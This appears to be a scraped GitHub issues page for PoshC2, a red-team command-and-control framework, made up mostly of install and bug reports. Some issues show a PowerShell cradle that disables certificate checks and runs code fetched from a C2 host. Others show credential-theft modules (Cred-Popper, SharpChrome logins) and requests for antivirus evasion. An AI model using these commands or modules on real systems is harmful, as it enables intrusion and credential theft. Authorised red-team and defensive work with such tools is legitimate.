
nettitude / poshc2


A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.

License: BSD 3-Clause "New" or "Revised" License

Python 3.10% C# 0.33% C 0.01% Shell 0.14% PowerShell 95.52% JavaScript 0.85% Dockerfile 0.01% HTML 0.05%
c2 csharp nettitude payloads poshc2 poshc2-installation powershell proxy-aware python3 redteam

poshc2's People

Contributors

0x413x4, archcloudlabs, b4ggio-su, baffledjimmy, benpturner, bli5s, console, dependabot[bot], developerbart, er28-0652, flangvik, h3x-agram, its-a-feature, kibercthulhu, lhagan-eth, mikecbone, philkeeble, pwndexter, riskydissonance, rolen, rustybower, skahwah, thehackerish, x41x41x41


poshc2's Issues

Posh-service not finding Yaml module

Yaml is installed and I also installed it via pipenv, yet no joy on the service setup seeing it. I have added to my bash profile the directory it shows as installed.

nickkilla@box:$ uname -a
Linux box 4.15.0-88-generic #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
nickkilla@box:$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.4 LTS
Release: 18.04
Codename: bionic
nickkilla@box:$ sudo pip3 install pyyaml
WARNING: The directory '/home/nickkilla/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (3.12)
nickkilla@box:$ sudo python3 -m pipenv run pip install pyyaml
Creating a virtualenv for this project…
Pipfile: /home/nickkilla/Pipfile
Using /usr/bin/python3 (3.6.9) to create virtualenv…
⠇ Creating virtual environment...created virtual environment CPython3.6.9.final.0-64 in 504ms
creator CPython3Posix(dest=/home/nickkilla/.local/share/virtualenvs/nickkilla-vAbj4hxZ, clear=False, global=False)
seeder FromAppData(download=False, pip=latest, setuptools=latest, wheel=latest, via=copy, app_data_dir=/home/nickkilla/.local/share/virtualenv/seed-v1)
activators BashActivator,CShellActivator,FishActivator,PowerShellActivator,PythonActivator,XonshActivator

✔ Successfully created virtual environment!
Virtualenv location: /home/nickkilla/.local/share/virtualenvs/nickkilla-vAbj4hxZ
Creating a Pipfile for this project…
WARNING: The directory '/home/nickkilla/.cache/pip' or its parent directory is not owned or is not writable by the current user. The cache has been disabled. Check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Collecting pyyaml
Downloading PyYAML-5.3.tar.gz (268 kB)
|████████████████████████████████| 268 kB 16.1 MB/s
Building wheels for collected packages: pyyaml
Building wheel for pyyaml (setup.py) ... done
Created wheel for pyyaml: filename=PyYAML-5.3-cp36-cp36m-linux_x86_64.whl size=44229 sha256=30d9ed31d412870b00f0096e8366b9893bfc1ef8ac12907a63ef322141927f6c
Stored in directory: /tmp/pip-ephem-wheel-cache-j6rg_hts/wheels/b1/86/0d/10e6c39d3a2b85ba807d7657ee80f08cc16c03f2aa2adf8e46
Successfully built pyyaml
Installing collected packages: pyyaml
Successfully installed pyyaml-5.3
nickkilla@box:~$ sudo posh-service
Creating a virtualenv for this project…
Pipfile: /opt/PoshC2/Pipfile
Using /usr/bin/python3.8 (3.8.0) to create virtualenv…
⠏ Creating virtual environment...created virtual environment CPython3.8.0.final.0-64 in 594ms
creator CPython3Posix(dest=/root/.local/share/virtualenvs/PoshC2-KGSTtxLR, clear=False, global=False)
seeder FromAppData(download=False, pip=latest, setuptools=latest, wheel=latest, via=copy, app_data_dir=/root/.local/share/virtualenv/seed-v1)
activators BashActivator,CShellActivator,FishActivator,PowerShellActivator,PythonActivator,XonshActivator

✔ Successfully created virtual environment!
Virtualenv location: /root/.local/share/virtualenvs/PoshC2-KGSTtxLR
Traceback (most recent call last):
File "start.py", line 8, in
run()
File "/opt/PoshC2/poshc2/init.py", line 13, in run
server.start()
File "/opt/PoshC2/poshc2/server/init.py", line 6, in start
from poshc2.server.C2Server import main
File "/opt/PoshC2/poshc2/server/C2Server.py", line 7, in
from poshc2.server.Implant import Implant
File "/opt/PoshC2/poshc2/server/Implant.py", line 3, in
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, ClockworkSMS_APIKEY, Pushover_APIToken, Pushover_APIUser, Sounds, ClockworkSMS_MobileNumbers, NotificationsProjectName
File "/opt/PoshC2/poshc2/server/Config.py", line 1, in
import os, yaml
ModuleNotFoundError: No module named 'yaml'

The request was aborted: Could not create SSL/TLS secure

PS C:\Users\Bob> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (new-object system.net.webclient).downloadstring('https://172.16.0.216:443/adsense/troubleshooter/1631343?id=Ndks8dmsPld_bs')
Exception calling "DownloadString" with "1" argument(s): "The request was aborted: Could not create SSL/TLS secure channel."
At line:1 char:82
+ ... = {$false};IEX (new-object system.net.webclient).downloadstring('htt ...
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Strange console/printline behavior in C2Viewer.py

Running clean install of 4.7 (issue also appears in 4.6), no update script used. Only Config.py changes were IP address and port configuration for my setup.

root@posh # python --version  
Python 2.7.15rc1

C2Viewer.py, when run, will continuously print an empty newline to the console when the following conditions are met:

  • No 'command returned against implant' messages have occurred since the C2Viewer.py script was started.
  • A new C# implant checks in (tested with Sharp_x64.dll).

There is no anomalous output in the journal view of C2Server.py.

C2Viewer.py also prints an integer to the console when it starts, that seems to be related to the cumulative number of commands entered into ImplantHandler.py.

v4.7/v4.6 Posh_v2_xxx.dll payloads crash with 0xc0000005

Payloads generated from clean 4.6 and 4.7 installs (no update script).

The v4 payloads seem to work fine, and the Sharp_x64.dll does as well.

Log Name:      Application
Source:        Windows Error Reporting
Date:          2/5/2019 9:17:30 AM
Event ID:      1001
Task Category: None
Level:         Information
Keywords:      Classic
User:          N/A
Computer:      Hinata
Description:
Fault bucket , type 0
Event Name: APPCRASH
Response: Not available
Cab Id: 0

Problem signature:
P1: rundll32.exe
P2: 10.0.17763.1
P3: c9fa47b6
P4: agent.dll <- renamed Posh_v2_x64.dll
P5: 0.0.0.0
P6: 5beb2a23
P7: c0000005
P8: 00001267
P9: 
P10: 

Analysis symbol: 
Rechecking for solution: 0
Report Id: 90ef0393-d5f4-4882-9a13-871d502952ed
Report Status: 100
Hashed bucket: 
Cab Guid: 0

The latest docker commit uses the wrong Kali Docker file

Unfortunately, I just did a fresh reinstall of posh after removing everything for other issues literally an hour ago, right after your recent change to the dockerfile, and now it won't install for docker.

Step 1/6 : FROM kalilinux/kali-linux-docker
pull access denied for kalilinux/kali-linux-docker, repository does not exist or may require 'docker login': denied: requested access to the resource is denied

Furthermore, it says on their site at https://www.kali.org/docs/containers/official-kalilinux-docker-images/
"Please note, kalilinux/kali-linux-docker is the former official image, it’s no longer updated. Don’t use it."

File downloads

When downloading files from implants, no checks are done to confirm if a file with the same name has previously been downloaded. This means the original file which was downloaded gets appended with the data from the new download.

Journalctl can suppress messages resulting in lost console output

When running posh as a service and using journalctl to view the logs (as per poshc2.service), if there are a lot of messages or lines then journalctl can suppress those messages, resulting in incomplete information being logged to the console.

The full output is still logged to the database however.

The initial limit on Linux Mint/Ubuntu appears to kick in around 3-4000 lines into a large file when it is cat-ed, but it's rate limiting, not line limiting, so the value will vary.

Journalctl rate limiting can be adjusted in /etc/systemd/journald.conf; rate limiting can be turned off with a value set to 0, but be aware this is a system-wide change.

See below for more information:

Install for docker does not work on Ubuntu 18

Install for docker does not work on Ubuntu 18. I am using the default Ubuntu 18 server from AWS, ami-06d51e91cea0dac8d. I have only run 5 commands on it so far: apt update, apt install docker.io, usermod -aG docker ubuntu, systemctl enable docker, systemctl start docker.

The script tries to do an apt-get update first instead of apt update, and it fails.

The 2 solutions would be either take this out and tell users to apt update first or (untested, but I ran it manually just before using this script) use apt instead of apt-get. When I comment the "apt-get" part out, the script works fine.

Here's the output with apt-get:

[+] Installing PoshC2

[+] Performing apt-get update
Reading package lists... Done
E: Could not open lock file /var/lib/apt/lists/lock - open (13: Permission denied)
E: Unable to lock directory /var/lib/apt/lists/
W: Problem unlinking the file /var/cache/apt/pkgcache.bin - RemoveCaches (13: Permission denied)
W: Problem unlinking the file /var/cache/apt/srcpkgcache.bin - RemoveCaches (13: Permission denied)

[+] Installing git & cloning PoshC2 into /opt/PoshC2
E: Could not open lock file /var/lib/dpkg/lock-frontend - open (13: Permission denied)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), are you root?
fatal: could not create work tree dir '/opt/PoshC2': Permission denied

[+] Copying useful scripts to /usr/bin
cp: cannot stat '/opt/PoshC2/resources/scripts/fpc': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-config': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-server': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-build': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-clean': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-docker-service': No such file or directory
cp: cannot stat '/opt/PoshC2/resources/scripts/posh-log': No such file or directory
chmod: cannot access '/usr/bin/fpc': No such file or directory
chmod: cannot access '/usr/bin/posh-config': No such file or directory
chmod: cannot access '/usr/bin/posh': No such file or directory
chmod: cannot access '/usr/bin/posh-server': No such file or directory
chmod: cannot access '/usr/bin/posh-docker-build': No such file or directory
chmod: cannot access '/usr/bin/posh-docker-clean': No such file or directory
chmod: cannot access '/usr/bin/posh-service': No such file or directory
chmod: cannot access '/usr/bin/posh-log': No such file or directory

[+] Setup complete

output with apt-get update commented out:

[+] Installing PoshC2


[+] Installing git & cloning PoshC2 into /opt/PoshC2
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Suggested packages:
  git-daemon-run | git-daemon-sysvinit git-doc git-el git-email git-gui gitk gitweb git-cvs git-mediawiki git-svn
The following packages will be upgraded:
  git
1 upgraded, 0 newly installed, 0 to remove and 77 not upgraded.
Need to get 3912 kB of archives.
After this operation, 49.2 kB of additional disk space will be used.
Get:1 http://us-west-2.ec2.archive.ubuntu.com/ubuntu bionic-updates/main amd64 git amd64 1:2.17.1-1ubuntu0.5 [3912 kB]
Fetched 3912 kB in 0s (38.9 MB/s)
(Reading database ... 56851 files and directories currently installed.)
Preparing to unpack .../git_1%3a2.17.1-1ubuntu0.5_amd64.deb ...
Unpacking git (1:2.17.1-1ubuntu0.5) over (1:2.17.1-1ubuntu0.4) ...
Setting up git (1:2.17.1-1ubuntu0.5) ...
Cloning into '/opt/PoshC2'...
remote: Enumerating objects: 60, done.
remote: Counting objects: 100% (60/60), done.
remote: Compressing objects: 100% (45/45), done.
remote: Total 2769 (delta 31), reused 33 (delta 15), pack-reused 2709
Receiving objects: 100% (2769/2769), 21.39 MiB | 40.41 MiB/s, done.
Resolving deltas: 100% (1848/1848), done.

[+] Copying useful scripts to /usr/bin

[+] Setup complete

EDIT: running the docker still doesn't work without a tweak.

ubuntu@ip-10-10-10-10:~$ posh-service
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-unit-files ===
Authentication is required to manage system service or unit files.
Authenticating as: Ubuntu (ubuntu)
Password: (there is none, it's a default AMI from AWS)

ubuntu@ip-10-10-10-10:~$ sudo posh-service
Failed to enable unit: Unit file poshc2-docker.service does not exist.
Failed to restart poshc2-docker.service: Unit poshc2-docker.service not found.

To fix the above, I had to run all posh commands with sudo.

ModuleNotFoundError: No module named 'yaml'

Hey,
I'm getting the following error when I try to run posh-server or any command, really.

Traceback (most recent call last):
File "start.py", line 8, in
run()
File "/opt/PoshC2/poshc2/init.py", line 13, in run
server.start()
File "/opt/PoshC2/poshc2/server/init.py", line 6, in start
from poshc2.server.C2Server import main
File "/opt/PoshC2/poshc2/server/C2Server.py", line 7, in
from poshc2.server.Implant import Implant
File "/opt/PoshC2/poshc2/server/Implant.py", line 3, in
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, ClockworkSMS_APIKEY, Pushover_APIToken, Pushover_APIUser, Sounds, ClockworkSMS_MobileNumbers, NotificationsProjectName
File "/opt/PoshC2/poshc2/server/Config.py", line 1, in
import os, yaml
ModuleNotFoundError: No module named 'yaml'

I've tried several times to install the module, but it seems to be installed already.

This is the result after running: pip install pyyaml.
Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (5.1.2)

HELP!

Config changes don't reflect

I changed the Kill Date using posh-config after starting the server, because I forgot to change it from the current date, then ran posh-stop-service and killed any remaining Posh processes completely. I rebooted the host machine so nothing was running. Even still, after restarting Posh, the config changes did not reflect; KD was still the current date and it did not read the config file. I had to run posh-update and it changed the config file back to default.

Download file issues

When downloading any file type of a slightly large size (a few MB), the following error is thrown:

Error downloading file:
ErrorDownload: Exception calling "UploadData" with "2" argument(s): "The request was aborted: The request was canceled."
Unknown error!
Input strings must be a multiple of 16 in length
Traceback (most recent call last):
File "C2Server.py", line 372, in do_POST
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
File "/opt/PoshC2/Core.py", line 69, in decrypt_bytes_gzip
data = aes.decrypt(data)
File "/root/.local/share/virtualenvs/PoshC2-KGSTtxLR/lib/python3.6/site-packages/Crypto/Cipher/blockalgo.py", line 295, in decrypt
return self._cipher.decrypt(ciphertext)
ValueError: Input strings must be a multiple of 16 in length

old implants handling after update

Hi,
Is there a way to handle old implants?
I've got 4 implants, but after I updated posh to the new version, keeping the old version's config file and certs, none of the older implants are working.
I get this message: Error with SharpSocks or old implant connection - is SharpSocks running
..... (the visited links)
and the screen is all red.
If there is a way to take back all the old implants I'll be grateful, because connecting back to all the implants on the client machines and trying to restart the process is a pain in the ass.

Thank you.
Bara.

Non-Standard Date Formatting Used

@benpturner

PoshC2 is an internationally used product, yet uses confusing UK date formatting for its output and configuration.

https://xkcd.com/1179/

The international organisation for standardisation (ISO) has a worldwide accepted format for date formatting defined as part of ISO 8601 - This follows the following formatting:

YYYY-MM-DD HH:MM:SS

This becomes easier to sort in tables, easier to read in output and results in no ambiguity from any users of PoshC2.

Clarification of docs concerning DLL entry points

So I'm confused by the documentation where it talks about VoidFunc and VoidFunc2 in the DLL payloads.

It makes sense that you'd have two entry points so that you can do PowerShell v2 downgrade.

What I don't understand is now, there are Posh_v2_x64.dll and Posh_v4_x64.dll in my payloads directory, but they both still have the same pair of entry points.

I tried it out, and when invoked manually from a test system with rundll32.exe the implants call back, with VoidFunc returning the Implant-Core.ps1 warning about logging and AMSI, and VoidFunc2 lacking those warnings. But the behavior is the same, seemingly, between the two DLLs.

Can we get some clarity on what the difference between these DLLs is, and why the v2 even has the VoidFunc2 entry point to begin with? Shouldn't it only have VoidFunc and only return the v2 PowerShell environment?

Can't seem to figure out sharpsocks

With an otherwise normally running implant, I can't seem to understand what I'm supposed to do in order to use the SharpSocks proxy.

The docs say that a command of the form
SharpSocks -Uri https://www.c2.com:443 -Beacon 2000 -Insecure
is supposed to get me up and running.

However, substituting my C2 server for the -uri (which is what I think I'm supposed to put there, the doc is unclear), I get

[-] Loading Assemblies

And then nothing.

If I just write 'sharpsocks' however, a seemingly fully automatic routine kicks in, which assembles the following invocation. (I'm fine with the key leak, this is just a temp testing instance):

Sharpsocks -Client -Uri https://192.168.10.3 -Channel mgjMOcupaHiHIyATayeYHSTsN -Key RRC1DX0CZqqh4PCEHD4yC/fMRW9VX+AW/iEl8S1qKMI= -URLs api/v1/socks5/,api/v1/socks/ -Insecure -Beacon 2000

Which results in:

[-] Loading Assemblies

[+] SharpSocks client Started!

URLs:
https://192.168.10.3/api/v1/socks5/
https://192.168.10.3/api/v1/socks/
Channel: mgjMOcupaHiHIyATayeYHSTsN
Key being used: RRC1DX0CZqqh4PCEHD4yC/fMRW9VX+AW/iEl8S1qKMI=
Beacon: 20
Cookies: ASP.NET_SessionId __RequestVerificationToken
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36


[-] Run StopSocks to stop the client!

That seems like it is working, but the issue is that I can't seem to find what port on the C2server's host I'm supposed to direct traffic through to take advantage of the proxy. Issuing ss -npl on my C2 host doesn't show any new listening ports.

Any input on what I'm missing/doing wrong would be a big help.

Can't run any custom/external modules

Running PoshC2 5.2 via Launcher.hta.

On a PowerShell implant, I've tried typing in:

LoadModule Invoke-MS16-032.ps1
LoadModule PPID-Spoof.ps1

But when I try to invoke these methods, it says the cmdlet is not recognized. What could be the problem here?

posh-stop-service not found

You don't create the posh-stop-service on Ubuntu when installed with the docker script.

ubuntu@host:~$ posh-stop-service
posh-stop-service: command not found

It's a problem because you also can't disable the service with sudo systemctl ; see below

ubuntu@host:~$ ps -ef | grep posh
ubuntu   26159 26145  0 00:18 pts/0    00:00:00 /bin/bash /usr/bin/posh-service
ubuntu   26164 26159  0 00:18 pts/0    00:00:00 systemctl enable poshc2-docker.service
ubuntu   26258 26145  0 00:26 pts/0    00:00:00 grep --color=auto posh
ubuntu@host:~$ sudo systemctl disable poshc2-docker.service
Failed to disable unit: Unit file poshc2-docker.service does not exist.

It doesn't show with systemctl list-units --type=service either. I had to kill -9 the process.

Error in starting c2server.py in POSHC2(python)

Hi,

I am getting the below error while starting C2Server.py (python). I tried on Kali with Python 2.7.15 running.

Error:

Initializing new project folder and database

Traceback (most recent call last):
File "C2Server.py", line 423, in
initializedb()
File "/opt/PoshC2_Python/DB.py", line 96, in initializedb
conn = sqlite3.connect(Database)
sqlite3.OperationalError: unable to open database file

Documentation missing sudo requirements

Running posh-service or posh-server without sudo doesn't work on Ubuntu 18, having something to do with "polkit" Authorization Manager not allowing systemctl calls. But once you accidentally run it without sudo it gets stuck because the prompt won't exit properly with Ctrl+C out of the polkit prompt (it puts all prompts on the same line and won't show typing).

The Auth Manager thing isn't PoshC2's problem but it could be avoided by telling users to run all commands with sudo or from a root prompt.

After update not work

I had version 4.5. I downloaded and set up the new version 4.6.
None of the payloads are working. When the payload starts, no connection information is displayed in the C2Server.py window and no implant appears in the ImplantHandler.py window, but in version 4.5 everything worked.

In Config.py I changed HostnameIP to the address that the ifconfig command shows for my interface.
Why does it not work?

Python < 2.7.9 SSL Error

Remove this line for all Python versions less than 2.7.9 when running a Python implant only.

ssl._create_default_https_context=ssl._create_unverified_context

Sharp Implant Still Running

There is an issue with the SharpImplant continuing to run in some situations which has not been fully bottomed out. There are a few ways the implant can be destroyed, but some have adverse effects on the host process and therefore have not been performed. Further work here is required to find the solution to best kill an active C# implant. The workaround is to inject into processes that are only running the implant and then kill that process using taskkill or similar code using start-process with args.

Obfuscation my friends....

Hello friends,
Undoubtedly one of the most invested and best tools available today!
The only problem is that, in the last year, it is strongly identified by antivirus engines and thus in fact cannot be used in a real environment.
Do you have any idea what to do?

posh-server complains about "Crypto" python lib

I had an error where PoshC2 server was complaining about no "Crypto" library when implants were coming in on PoshC2 v5.2. It was causing implants to fail.

For a temp fix I found running:
python3 -m pipenv run pip uninstall pycrypto
Then:
python3 -m pipenv run pip install pycryptodome

Did the trick.

Sharp Payloads

I just want to confirm if the payloads are working for anyone? I've disabled all AV etc. and tried running on Windows 7 and Windows 10.

None of the sharp payloads seem to work for me, however, powershell all fine.

The term <run-exe> is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

PoshC2 Version: 5.1 - 21553fa 2019-12-07
Loaded Module: SharpChrome.exe

Used Command:
loadmodule SharpChrome.exe - Module loaded successfully
run-exe SharpChrome.Program SharpChrome logins - The term is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

I tried other modules (SharPersist, Seatbelt) and got the same result (it can't recognize run-exe).

Output Truncated

The output-to-html function is truncating my logs. How do I see the truncated data?

Thanks!!

Report Generation Not Working

Running on Ubuntu 16.04 with Python 3.8.

Everything works okay, but when I try to generate a report I get the following error:

Error: module 'cgi' has no attribute 'escape'

upload-file error in PS implant

Exception calling "WriteAllBytes" with "2" argument(s): "Access to the path 'c:\users\public\videos' is denied."
At line:536 char:13
+         [io.file]::WriteAllBytes($Destination, $fileBytes)
    + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : UnauthorizedAccessException

The above error happens in PS implant, when you try to upload a file. However, within the same directory, one can create a new file with echo test > test.txt and when listed, it's there, in the same folder, which means you do have access to write to that path.

Error encrypting value: object type

If you get this error after installing PoshC2 try creating a virtualenv in python and re-install the requirements. Make sure you deactivate when you've finished in this virtualenv.

pip install virtualenv
virtualenv /opt/PoshC2_Python/
source /opt/PoshC2_Python/bin/activate
pip install -r requirements.txt

Decryption error: You must not use 8-bit bytestrings

Decryption error: You must not use 8-bit bytestrings unless you use a text_factory that can interpret 8-bit bytestrings (like text_factory = str). It is highly recommended that you instead just switch your application to Unicode strings.

This happens when running in French with an accent, e.g. Système. A fix is required in the C2Server line:

newImplant = Implant(IPAddress, implant_type, Domain,USER, Hostname, Arch, PID, Proxy)

'download-file' seems to lock files after completion

Using 4.7, if I run download-file on a file, and then try to delete it from the remote host, I get a locking error from PowerShell

Command issued against implant 23 on host ALPHA 0METALAB (03/13/2019 05:56:36)
rm GUID.txt

Command returned against implant 23 on host 0METALAB\user @ ALPHA (03/13/2019 05:56:37)

rm : Cannot remove item C:\Users\user\GUID.txt: The process cannot access the file 'C:\Users\user\GUID.txt'
because it is being used by another process.
At line:1 char:1
+ rm GUID.txt
+ ~~~~~~~~~~~
    + CategoryInfo          : WriteError: (C:\Users\user\GUID.txt:FileInfo) [Remove-Item], IOException
    + FullyQualifiedErrorId : RemoveFileSystemItemIOError,Microsoft.PowerShell.Commands.RemoveItemCommand

Sometimes I can shake this off by running other PoshC2 commands, but not always.

Notify when end date is near/has passed

When setting the end date of payloads in Posh there is no warning in the framework when the kill date has been set in the past (e.g. you're on an engagement and forget to edit the date and can't get anything to come back because you've not been paying attention). Is there any way a warning/error message could be shown to help with debugging?

Studying the project for contribution and further dev.

Hi,
I have been using this awesome tool for a while, and it has lately become very popular.
But I'm facing some problems with detection (Windows Defender, at least, has become aware of it).
So I decided to modify the code, but I could not understand how the b64 files in the Files directory are created; it seems that they are already compiled and encoded. Could someone give us the source code of these files and explain how to modify them?

thank you.

Autoruns not triggering modules

Environment:

Latest Kali Linux, (fully updated)
PoshC2, (Pulled from Git today)

Whenever triggering Autorun Modules for new implants I receive the following errors, even though the modules run fine when run manually on the Implant through the ImplantHandler.

In the Server window, when a new Implant stages the and the Autorun tasks start, the following is output:

Output from failed Autorun....

Task 00003 (autoruns) issued against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:24)
loadmodule Stage2-Core.ps1


Task 00004 (autoruns) issued against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:24)
cred-popper.ps1

Task 00003 (autoruns) returned against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:25)
Module loaded sucessfully

Task 00004 (autoruns) returned against implant 2 on host VICTIM\User* @ VICTIM (05/08/2019 20:15:26)

ErrorCmd: The term 'cred-popper.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

It appears to be a case of the Autorun function lower casing the command for storage as issuing the command "autorun LoadModule Cred-Popper.ps1" returns "add-autorun: loadmodule cred-popper.ps1". The successful Autorun, (Task003), which is part of the automated Staging process shows that the "Stage2-Core.ps1" is correctly capitalised but the user added Autorun, (Task004), is not working.

However, when run directly on the Implant, by running the command "cred-popper", the Task completes successfully with a correctly capitalised command, "Cred-Popper.ps1", and the following is output in the C2Server window:

Output from successful run via Implant....

Task 00005 issued against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
loadmodule Cred-Popper.ps1


Task 00006 issued against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
cred-popper 


Task 00005 returned against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:08)
Module loaded sucessfully

Task 00006 returned against implant 1 on host VICTIM\User* @ VICTIM (05/08/2019 20:24:09)


[+] Cred-Popper started in background runspace

Run Get-Creds to obtain the output, when the user enters their credentials

Not all of the Autoruns are broken, for example the "get-screenshot" command runs without problem, but from what I can tell all the modules in the PoshC2_Python/Modules fail:

Output from working Autorun module....

Task 00009 (autoruns) issued against implant 3 on host VICTIM\User* @ VICTIM (05/08/2019 20:37:51)
get-screenshot

Task 00009 (autoruns) returned against implant 3 on host VICTIM\User* @ VICTIM (05/08/2019 20:37:55)
Screenshot captured: /root/PoshC2_Project/downloads/VICTIM-05082019203755_jTXC3xWK9drEtkL.png

I've tried lowercasing the PowerShell script name to "cred-popper.ps1", which bypasses the error being thrown in the Task but the function appears to silently fail, so if anyone has any ideas for workarounds they'd be greatly appreciated!

Flag which implants have Daisy running

Just like we have [SharpSocks] next to implants running the socks proxy any chance we can have [Daisy] next to implants running daisy? Makes remembering which implants are performing pivoting a little easier ;-)

Sessions all down suddenly

I got this error 20 min after activating a session, and then it goes down:

```
'NoneType' object has no attribute 'replace'
Traceback (most recent call last):
File "C2Server.py", line 325, in do_POST
cookieVal = (s.cookieHeader).replace("SessionID=", "")
AttributeError: 'NoneType' object has no attribute 'replace'

'NoneType' object has no attribute 'replace'
Traceback (most recent call last):
File "C2Server.py", line 325, in do_POST
cookieVal = (s.cookieHeader).replace("SessionID=", "")
AttributeError: 'NoneType' object has no attribute 'replace'
```

Config file mismatch between docker version and non-docker version

Hello,

I was having trouble setting the project directory and getting the posh-docker-server to use the intended project directory.

After checking the files I found that there is a discrepancy between the config file being used by the docker version and the non-docker version.

The docker version is using Config.py to get the variables of the project path, and the non-docker version is using config.yml.

The posh-config file edits the Config.py file:
(screenshot: cat_posh-config)

The posh-docker-server uses the Config.py file:
(screenshot: cat_posh-docker-server)

But the posh-server called by the posh-docker-server when starting the docker uses the config.yml file:
(screenshot: cat_posh-server)

I don't know if this is a change from newer versions, but there is a mismatch about which config file is the correct one to use.

Workaround: to make it use the project folder defined by me, I had to change the config file config.yml to my needs.

Can't join slack

Hi,

I'd like to join the advertised slack channel, for questions as well as to contribute but it requires a nettitude email address, is it possible (and desired) to have this opened up?

Thanks
